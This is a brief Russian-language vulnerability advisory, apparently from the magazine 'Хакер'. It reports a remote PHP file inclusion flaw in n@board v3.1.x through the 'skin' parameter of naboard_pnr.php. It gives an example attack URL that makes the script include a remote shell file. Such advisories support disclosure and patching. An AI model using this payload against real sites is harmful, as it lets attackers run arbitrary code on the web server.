PHP-инклюдинг в n@board

Рекомендуем почитать:

Хакер #308. Pentest Award 2024

Содержание выпуска
Подписка на «Хакер»-60%

Программа: n@board v3.1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "skin" в сценарии naboard_pnr.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.target.***/[path]/naboard_pnr.php?skin=http://shell.txt?

PHP-инклюдинг в n@board

Хакер #308. Pentest Award 2024

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Штурмуем крепость. Обходим аутентификацию в FortiOS и FortiProxy

HTB Cicada. Проводим базовые атаки на Active Directory

Хакеры.RU. Глава 0х0F. Реинициализация

«Злой провод» HackCable собрал 50000 евро на Kickstarter

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

За месяц число атак на клиентов российских банков с использованием NFCGate выросло на 80%

Журналисты обнаружили SIO — нового производителя коммерческого шпионского ПО

Атаки на брандмауэры SonicWall начались сразу после появления PoC-эксплоита

Защита Chrome Enhanced Protection теперь использует ИИ

Малварь для macOS XCSSET обновилась впервые с 2022 года